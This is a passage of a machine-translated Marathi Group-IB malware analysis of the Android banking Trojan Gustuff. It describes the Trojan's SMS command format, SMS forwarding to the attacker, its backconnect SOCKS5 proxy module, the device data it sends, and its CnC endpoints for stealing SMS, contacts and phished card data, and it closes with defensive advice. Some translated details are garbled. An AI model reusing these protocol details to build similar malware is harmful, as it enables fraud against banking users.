एसएमएस संदेश स्वीकारण्यासाठी अनुप्रयोग संक्रमित डिव्हाइससाठी इव्हेंट हँडलर स्थापित करतो. अभ्यासाअंतर्गत असलेल्या अनुप्रयोगास ऑपरेटरकडून आदेश प्राप्त होऊ शकतात, जे एसएमएस संदेशाच्या मुख्य भागामध्ये येतात. कमांड फॉरमॅटमध्ये येतात:

7!5=<%Base64 एन्कोडेड कमांड%>

अनुप्रयोग सर्व येणार्‍या SMS संदेशांमध्ये स्ट्रिंग शोधतो ७!५=, जेव्हा एखादी स्ट्रिंग आढळते, तेव्हा ते ऑफसेट 64 वर बेस4 वरून स्ट्रिंग डीकोड करते आणि कमांड कार्यान्वित करते. कमांड सीएनसी सारख्याच आहेत. अंमलबजावणीचा निकाल त्याच नंबरवर पाठविला जातो ज्यावरून कमांड आली होती. प्रतिसाद स्वरूप:

7*5=<%Base64 encode of “result_code command”%>

वैकल्पिकरित्या, अनुप्रयोग सर्व प्राप्त संदेश रूट क्रमांकावर पाठवू शकतो. हे करण्यासाठी, प्राधान्य फाइलमध्ये रूट क्रमांक निर्दिष्ट करणे आवश्यक आहे आणि संदेश पुनर्निर्देशन ध्वज सेट करणे आवश्यक आहे. आक्रमणकर्त्याच्या नंबरवर एक एसएमएस संदेश फॉरमॅटमध्ये पाठविला जातो:

<%क्रमांक%> - <%वेळ, स्वरूप: dd/MM/yyyy HH:mm:ss%> <%SMS body%>

तसेच, वैकल्पिकरित्या, अनुप्रयोग CnC वर संदेश पाठवू शकतो. एसएमएस संदेश सर्व्हरला JSON स्वरूपात पाठविला जातो:

{
    "id":<%BotID%>,
    "sms":
    {
        "text":<%SMS body%>,
        "number":<%From number%>,
        "date":<%Timestamp%>
    }
}

ध्वज लावला तर nameGenerator("DEFAULT_APP_SMS") - अनुप्रयोग एसएमएस संदेशावर प्रक्रिया करणे थांबवतो आणि येणार्‍या संदेशांची सूची साफ करतो.

प्रॉक्सी मॉड्यूल

अभ्यासाधीन अनुप्रयोगामध्ये बॅककनेक्ट प्रॉक्सी मॉड्यूल (यापुढे प्रॉक्सी मॉड्यूल म्हणून संदर्भित) आहे, ज्यामध्ये एक स्वतंत्र वर्ग आहे ज्यामध्ये कॉन्फिगरेशनसह स्थिर फील्ड समाविष्ट आहेत. कॉन्फिगरेशन डेटा नमुन्यामध्ये स्पष्ट स्वरूपात संग्रहित केला जातो:

प्रॉक्सी मॉड्यूलद्वारे केलेल्या सर्व क्रिया फायलींमध्ये लॉग इन केल्या जातात. हे करण्यासाठी, एक्सटर्नल स्टोरेजमधील अॅप्लिकेशन “लॉग्स” (कॉन्फिगरेशन क्लासमधील ProxyConfigClass.logsDir फील्ड) नावाची निर्देशिका तयार करते, ज्यामध्ये लॉग फाइल्स साठवल्या जातात. नावांसह फायलींमध्ये लॉगिंग होते:

main.txt - कमांडसर्व्हर नावाच्या क्लासचे काम या फाईलमध्ये लॉग इन केले आहे. पुढे काय, या फाईलमध्ये स्ट्रिंग स्ट्रिंग लॉग करणे हे mainLog(str) म्हणून दर्शविले जाईल.
सत्र-<%id%>.txt — ही फाइल विशिष्ट प्रॉक्सी सत्राशी संबंधित लॉग डेटा वाचवते. खालीलप्रमाणे, या फाईलमध्ये स्ट्रिंग स्ट्रिंग लॉग करणे हे सत्रलॉग (str) म्हणून दर्शविले जाईल.
server.txt - या फाईलचा वापर वर वर्णन केलेल्या फायलींवर लिहिलेला सर्व डेटा लॉग करण्यासाठी केला जातो.

लॉग डेटा स्वरूप:

<%तारीख%> [थ्रेड[<%थ्रेड आयडी%>], आयडी[]]: लॉग-स्ट्रिंग

प्रॉक्सी मॉड्यूलच्या ऑपरेशन दरम्यान उद्भवणारे अपवाद देखील फाइलमध्ये लॉग केले जातात. हे करण्यासाठी, ऍप्लिकेशन खालील फॉरमॅटमध्ये JSON ऑब्जेक्ट व्युत्पन्न करते:

{
    "uncaughtException":<%short description of throwable%>
    "thread":<%thread%>
    "message":<%detail message of throwable%>
    "trace":        //Stack trace info
        [
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            },
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            }
        ]
}

मग ते स्ट्रिंग प्रतिनिधित्वात रूपांतरित करते आणि लॉग करते.

संबंधित कमांड प्राप्त झाल्यानंतर प्रॉक्सी मॉड्यूल लाँच केले जाते. जेव्हा प्रॉक्सी मॉड्यूल लाँच करण्याची आज्ञा प्राप्त होते, तेव्हा अनुप्रयोग नावाची सेवा सुरू करतो मुख्य सेवा, जे प्रॉक्सी मॉड्यूलचे ऑपरेशन व्यवस्थापित करण्यासाठी जबाबदार आहे - ते सुरू करणे आणि थांबवणे.

सेवा सुरू करण्याचे टप्पे:

1. एक टाइमर सुरू करतो जो मिनिटातून एकदा चालतो आणि प्रॉक्सी मॉड्यूलची क्रियाकलाप तपासतो. मॉड्यूल सक्रिय नसल्यास, ते ते सुरू करते.
तसेच जेव्हा इव्हेंट ट्रिगर केला जातो android.net.conn.CONNECTIVITY_CHANGE प्रॉक्सी मॉड्यूल लाँच केले आहे.

2. अनुप्रयोग पॅरामीटरसह वेक-लॉक तयार करतो PARTIAL_WAKE_LOCK आणि त्याला पकडतो. हे डिव्हाइस CPU ला स्लीप मोडमध्ये जाण्यापासून प्रतिबंधित करते.

3. प्रॉक्सी मॉड्यूलचा कमांड प्रोसेसिंग क्लास लाँच करते, प्रथम ओळ लॉगिंग करते mainLog("प्रारंभ सर्व्हर") и

सर्व्हर::स्टार्ट() होस्ट[<%proxy_cnc%>], commandPort[<%command_port%>], proxyPort[<%proxy_port%>]

जेथे proxy_cnc, command_port आणि proxy_port - प्रॉक्सी सर्व्हर कॉन्फिगरेशनमधून प्राप्त केलेले पॅरामीटर्स.

कमांड प्रोसेसिंग क्लास म्हणतात कमांड कनेक्शन. स्टार्टअप नंतर लगेच, खालील क्रिया करते:

4. शी जोडतो ProxyConfigClass.host: ProxyConfigClass.commandPort आणि JSON फॉरमॅटमध्‍ये संक्रमित डिव्‍हाइसचा डेटा पाठवते:

{
    "id":<%id%>,
    "imei":<%imei%>,
    "imsi":<%imsi%>,
    "model":<%model%>,
    "manufacturer":<%manufacturer%>,
    "androidVersion":<%androidVersion%>,
    "country":<%country%>,
    "partnerId":<%partnerId%>,
    "packageName":<%packageName%>,
    "networkType":<%networkType%>,
    "hasGsmSupport":<%hasGsmSupport%>,
    "simReady":<%simReady%>,
    "simCountry":<%simCountry%>,
    "networkOperator":<%networkOperator%>,
    "simOperator":<%simOperator%>,
    "version":<%version%>
}

कोठे:

id – आयडेंटिफायर, “x” नावाच्या शेअर्ड प्रेफरन्स फाइलमधून “id” फील्डसह मूल्य मिळविण्याचा प्रयत्न करतो. जर हे मूल्य मिळू शकले नाही, तर ते एक नवीन व्युत्पन्न करते. अशा प्रकारे, प्रॉक्सी मॉड्यूलचे स्वतःचे आयडेंटिफायर आहे, जे बॉट आयडी प्रमाणेच तयार केले जाते.
imei — डिव्हाइसचा IMEI. मूल्य प्राप्त करण्याच्या प्रक्रियेदरम्यान त्रुटी आढळल्यास, या फील्डऐवजी त्रुटी मजकूर संदेश लिहिला जाईल.
imsi — डिव्हाइसची आंतरराष्ट्रीय मोबाइल ग्राहक ओळख. मूल्य प्राप्त करण्याच्या प्रक्रियेदरम्यान त्रुटी आढळल्यास, या फील्डऐवजी त्रुटी मजकूर संदेश लिहिला जाईल.
मॉडेल — अंतिम उत्पादनासाठी अंतिम वापरकर्ता-दृश्यमान नाव.
निर्माता — उत्पादन/हार्डवेअरचा निर्माता (Build.MANUFACTURER).
androidVersion - "<%release_version%> (<%os_version%>),<%sdk_version%>" फॉरमॅटमधील एक स्ट्रिंग
देश — डिव्हाइसचे वर्तमान स्थान.
partnerId ही रिकामी स्ट्रिंग आहे.
पॅकेजचे नाव - पॅकेजचे नाव.
नेटवर्क प्रकार — वर्तमान नेटवर्क कनेक्शनचा प्रकार (उदाहरण: “WIFI”, “MOBILE”). त्रुटी आढळल्यास, शून्य परत करते.
hasGsmSupport – खरे – जर फोन GSM ला समर्थन देत असेल, अन्यथा खोटे.
simReady - सिम कार्ड स्थिती.
simCountry - ISO देश कोड (सिम कार्ड प्रदात्यावर आधारित).
नेटवर्क ऑपरेटर — ऑपरेटरचे नाव. मूल्य प्राप्त करण्याच्या प्रक्रियेदरम्यान त्रुटी आढळल्यास, या फील्डऐवजी त्रुटी मजकूर संदेश लिहिला जाईल.
simOperator — सेवा प्रदाता नाव (SPN). मूल्य प्राप्त करण्याच्या प्रक्रियेदरम्यान त्रुटी आढळल्यास, या फील्डऐवजी त्रुटी मजकूर संदेश लिहिला जाईल.
आवृत्ती - हे फील्ड कॉन्फिगरेशन क्लासमध्ये संग्रहित केले आहे; बॉटच्या चाचणी केलेल्या आवृत्त्यांसाठी ते "1.6" च्या समान होते.

5. सर्व्हरवरील आदेशांची प्रतीक्षा करण्याच्या मोडवर स्विच करते. सर्व्हरवरील कमांड फॉरमॅटमध्ये येतात:

0 ऑफसेट - कमांड
1 ऑफसेट - सत्र आयडी
2 ऑफसेट - लांबी
4 ऑफसेट - डेटा

जेव्हा आज्ञा येते, तेव्हा अनुप्रयोग लॉग करतो:
mainLog("शीर्षलेख { sessionId<%id%>], type[<%command%>], length[<%length%>] }")

सर्व्हरवरून खालील आदेश शक्य आहेत:

नाव	आदेश	डेटा	वर्णन
कनेक्शन आयडी	0	कनेक्शन आयडी	नवीन कनेक्शन तयार करा
स्लीप	3	वेळ	प्रॉक्सी मॉड्यूलला विराम द्या
पिंग पाँग	4	-	PONG संदेश पाठवा

PONG संदेशामध्ये 4 बाइट्स असतात आणि ते असे दिसते: 0x04000000.

कनेक्शनआयडी कमांड प्राप्त झाल्यावर (नवीन कनेक्शन तयार करण्यासाठी) कमांड कनेक्शन वर्गाचे उदाहरण तयार करते प्रॉक्सी कनेक्शन.

प्रॉक्सीमध्ये दोन वर्ग भाग घेतात: प्रॉक्सी कनेक्शन и शेवट. वर्ग तयार करताना प्रॉक्सी कनेक्शन पत्त्याशी कनेक्ट करत आहे ProxyConfigClass.host: ProxyConfigClass.proxyPort आणि JSON ऑब्जेक्ट पास करणे:

 {
    "id":<%connectionId%>
}

प्रतिसादात, सर्व्हर SOCKS5 संदेश पाठवतो ज्यामध्ये रिमोट सर्व्हरचा पत्ता असतो ज्यासह कनेक्शन स्थापित केले जाणे आवश्यक आहे. या सर्व्हरशी परस्परसंवाद वर्गाद्वारे होतो शेवट. कनेक्शन सेटअप योजनाबद्धपणे खालीलप्रमाणे दर्शविले जाऊ शकते:

नेटवर्क परस्परसंवाद

नेटवर्क स्निफरद्वारे रहदारीचे विश्लेषण रोखण्यासाठी, CnC सर्व्हर आणि अनुप्रयोग यांच्यातील परस्परसंवाद SSL प्रोटोकॉल वापरून संरक्षित केला जाऊ शकतो. सर्व प्रसारित केलेला डेटा सर्व्हरवरून आणि ते दोन्ही JSON स्वरूपात सादर केला जातो. ऑपरेशन दरम्यान अनुप्रयोग खालील विनंत्या कार्यान्वित करतो:

http://<%CnC%>/api/v1/set_state.php - कमांडच्या अंमलबजावणीचा परिणाम.
http://<%CnC%>/api/v1/get.php - आदेश प्राप्त करणे.
http://<%CnC%>/api/v1/load_sms.php - संक्रमित उपकरणावरून एसएमएस संदेश डाउनलोड करणे.
http://<%CnC%>/api/v1/load_ab.php — संक्रमित उपकरणावरील संपर्कांची यादी अपलोड करणे.
http://<%CnC%>/api/v1/aevents.php - प्राधान्य फाइलमध्ये असलेले पॅरामीटर्स अपडेट करताना विनंती केली जाते.
http://<%CnC%>/api/v1/set_card.php — Google Play Market म्हणून मास्करेडिंग फिशिंग विंडो वापरून मिळवलेला डेटा अपलोड करणे.
http://<%CnC%>/api/v1/logs.php - लॉग डेटा अपलोड करत आहे.
http://<%CnC%>/api/v1/records.php - फिशिंग विंडोद्वारे प्राप्त केलेला डेटा अपलोड करणे.
http://<%CnC%>/api/v1/set_error.php - उद्भवलेल्या त्रुटीची सूचना.

शिफारसी

त्यांच्या ग्राहकांचे मोबाइल ट्रोजनच्या धोक्यापासून संरक्षण करण्यासाठी, कंपन्यांनी सर्वसमावेशक उपाय वापरणे आवश्यक आहे जे त्यांना वापरकर्त्याच्या डिव्हाइसेसवर अतिरिक्त सॉफ्टवेअर स्थापित न करता दुर्भावनापूर्ण क्रियाकलापांचे परीक्षण आणि प्रतिबंध करण्यास अनुमती देतात.

हे करण्यासाठी, मोबाइल ट्रोजन शोधण्यासाठी स्वाक्षरी पद्धती क्लायंट आणि स्वतः अनुप्रयोग दोघांच्या वर्तनाचे विश्लेषण करण्यासाठी तंत्रज्ञानासह मजबूत करणे आवश्यक आहे. संरक्षणामध्ये डिजीटल फिंगरप्रिंट तंत्रज्ञानाचा वापर करून डिव्हाइस ओळख कार्य देखील समाविष्ट केले पाहिजे, ज्यामुळे एखादे खाते कधी अॅटिपिकल डिव्हाइसवरून वापरले जात आहे आणि ते आधीच फसवणूक करणार्‍याच्या हाती पडले आहे हे समजणे शक्य होईल.

मूलभूतपणे महत्त्वाचा मुद्दा म्हणजे क्रॉस-चॅनल विश्लेषणाची उपलब्धता, ज्यामुळे कंपन्यांना केवळ इंटरनेटवरच नव्हे, तर मोबाइल चॅनेलवर देखील उद्भवणाऱ्या जोखमींवर नियंत्रण ठेवता येते, उदाहरणार्थ, मोबाइल बँकिंगच्या अनुप्रयोगांमध्ये, क्रिप्टोकरन्सीसह व्यवहारांसाठी आणि इतर कोणत्याही ठिकाणी व्यवहार करता येतात.आर्थिक व्यवहार.

वापरकर्त्यांसाठी सुरक्षा नियमः

Google Play व्यतिरिक्त इतर कोणत्याही स्त्रोतांकडून Android OS सह मोबाइल डिव्हाइससाठी अनुप्रयोग स्थापित करू नका, अनुप्रयोगाद्वारे विनंती केलेल्या अधिकारांकडे विशेष लक्ष द्या;
नियमितपणे Android OS अद्यतने स्थापित करा;
डाउनलोड केलेल्या फायलींच्या विस्ताराकडे लक्ष द्या;
संशयास्पद संसाधनांना भेट देऊ नका;
एसएमएस संदेशांमध्ये प्राप्त झालेल्या लिंकवर क्लिक करू नका.

तारांकित सेमियन रोगाचेवा, ग्रुप-आयबी कॉम्प्युटर फॉरेन्सिक्स प्रयोगशाळेतील मालवेअर संशोधनातील कनिष्ठ विशेषज्ञ.

स्त्रोत: www.habr.com

Android Trojan Gustuff तुमच्या खात्यांमधून क्रीम (fiat आणि crypto) कसे स्किम करते